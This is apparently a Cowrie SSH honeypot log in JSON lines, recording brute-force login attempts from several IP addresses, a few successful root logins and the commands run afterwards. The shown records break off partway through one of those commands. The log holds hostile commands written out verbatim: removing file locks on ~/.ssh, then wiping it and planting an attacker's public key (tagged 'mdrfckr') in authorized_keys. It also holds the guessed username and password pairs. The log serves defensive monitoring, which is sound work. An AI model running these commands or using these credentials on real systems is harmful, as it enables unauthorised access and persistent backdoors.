{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:41:15.624764Z","src_ip":"199.195.248.191","session":"58be7c4e1237"}
{"eventid":"cowrie.login.failed","username":"tata","password":"tata","message":"login attempt [tata/tata] failed","sensor":"my-vps","timestamp":"2025-08-26T19:41:16.141245Z","src_ip":"199.195.248.191","session":"58be7c4e1237"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:41:16.472035Z","src_ip":"212.227.235.229","session":"20f77343d121"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:41:17.308543Z","src_ip":"199.195.248.191","session":"58be7c4e1237"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":46770,"dst_ip":"1.2.3.4","dst_port":22,"session":"049bb3dabeb3","protocol":"ssh","message":"New connection: 217.154.1.158:46770 (1.2.3.4:22) [session: 049bb3dabeb3]","sensor":"my-vps","timestamp":"2025-08-26T19:41:18.576494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:41:18.577276Z","src_ip":"217.154.1.158","session":"049bb3dabeb3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:41:18.591911Z","src_ip":"217.154.1.158","session":"049bb3dabeb3"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-26T19:41:18.641001Z","src_ip":"217.154.1.158","session":"049bb3dabeb3"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:41:19.658245Z","src_ip":"217.154.1.158","session":"049bb3dabeb3"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":60400,"dst_ip":"1.2.3.4","dst_port":22,"session":"45a9c568be60","protocol":"ssh","message":"New connection: 217.154.1.158:60400 (1.2.3.4:22) [session: 45a9c568be60]","sensor":"my-vps","timestamp":"2025-08-26T19:41:36.197935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:41:36.198864Z","src_ip":"217.154.1.158","session":"45a9c568be60"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:41:36.213381Z","src_ip":"217.154.1.158","session":"45a9c568be60"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-26T19:41:36.256447Z","src_ip":"217.154.1.158","session":"45a9c568be60"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:41:37.272489Z","src_ip":"217.154.1.158","session":"45a9c568be60"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":34408,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb9482bf9a67","protocol":"ssh","message":"New connection: 217.154.1.158:34408 (1.2.3.4:22) [session: cb9482bf9a67]","sensor":"my-vps","timestamp":"2025-08-26T19:41:53.698534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:41:53.700092Z","src_ip":"217.154.1.158","session":"cb9482bf9a67"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:41:53.714118Z","src_ip":"217.154.1.158","session":"cb9482bf9a67"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:41:53.757759Z","src_ip":"217.154.1.158","session":"cb9482bf9a67"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:41:54.775686Z","src_ip":"217.154.1.158","session":"cb9482bf9a67"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":37764,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dbe628e7fef","protocol":"ssh","message":"New connection: 217.154.1.158:37764 (1.2.3.4:22) [session: 2dbe628e7fef]","sensor":"my-vps","timestamp":"2025-08-26T19:42:11.245776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:42:11.246574Z","src_ip":"217.154.1.158","session":"2dbe628e7fef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:42:11.261638Z","src_ip":"217.154.1.158","session":"2dbe628e7fef"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher123","message":"login attempt [rancher/rancher123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:42:11.306254Z","src_ip":"217.154.1.158","session":"2dbe628e7fef"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:12.322571Z","src_ip":"217.154.1.158","session":"2dbe628e7fef"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":40654,"dst_ip":"1.2.3.4","dst_port":22,"session":"dec60daeac78","protocol":"ssh","message":"New connection: 199.195.248.191:40654 (1.2.3.4:22) [session: dec60daeac78]","sensor":"my-vps","timestamp":"2025-08-26T19:42:19.274140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:42:19.287306Z","src_ip":"199.195.248.191","session":"dec60daeac78"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:42:19.374935Z","src_ip":"199.195.248.191","session":"dec60daeac78"}
{"eventid":"cowrie.login.success","username":"root","password":"2wsxZAQ!","message":"login attempt [root/2wsxZAQ!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:42:19.731109Z","src_ip":"199.195.248.191","session":"dec60daeac78"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:42:20.041620Z","src_ip":"199.195.248.191","session":"dec60daeac78"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:42:20.042481Z","src_ip":"199.195.248.191","session":"dec60daeac78"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:42:20.043728Z","src_ip":"199.195.248.191","session":"dec60daeac78"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:20.139872Z","src_ip":"199.195.248.191","session":"dec60daeac78"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:42:20.389121Z","src_ip":"199.195.248.191","session":"dec60daeac78"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:42:20.389954Z","src_ip":"199.195.248.191","session":"dec60daeac78"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:42:20.491054Z","src_ip":"199.195.248.191","session":"dec60daeac78"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:20.491947Z","src_ip":"199.195.248.191","session":"dec60daeac78"}
{"eventid":"cowrie.session.connect","src_ip":"167.172.153.88","src_port":47844,"dst_ip":"1.2.3.4","dst_port":22,"session":"64cc423a349f","protocol":"ssh","message":"New connection: 167.172.153.88:47844 (1.2.3.4:22) [session: 64cc423a349f]","sensor":"my-vps","timestamp":"2025-08-26T19:42:20.575704Z"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":41296,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa543a2802d3","protocol":"ssh","message":"New connection: 199.195.248.191:41296 (1.2.3.4:22) [session: fa543a2802d3]","sensor":"my-vps","timestamp":"2025-08-26T19:42:20.576798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:42:20.577927Z","src_ip":"167.172.153.88","session":"64cc423a349f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:42:20.581983Z","src_ip":"199.195.248.191","session":"fa543a2802d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:42:20.668254Z","src_ip":"167.172.153.88","session":"64cc423a349f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:42:20.680247Z","src_ip":"199.195.248.191","session":"fa543a2802d3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:42:21.058330Z","src_ip":"199.195.248.191","session":"fa543a2802d3"}
{"eventid":"cowrie.login.success","username":"root","password":"linux2021","message":"login attempt [root/linux2021] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:42:21.069556Z","src_ip":"167.172.153.88","session":"64cc423a349f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:42:21.272645Z","src_ip":"167.172.153.88","session":"64cc423a349f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:42:21.273533Z","src_ip":"167.172.153.88","session":"64cc423a349f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:42:21.275064Z","src_ip":"167.172.153.88","session":"64cc423a349f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:21.367286Z","src_ip":"167.172.153.88","session":"64cc423a349f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:42:21.651118Z","src_ip":"167.172.153.88","session":"64cc423a349f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 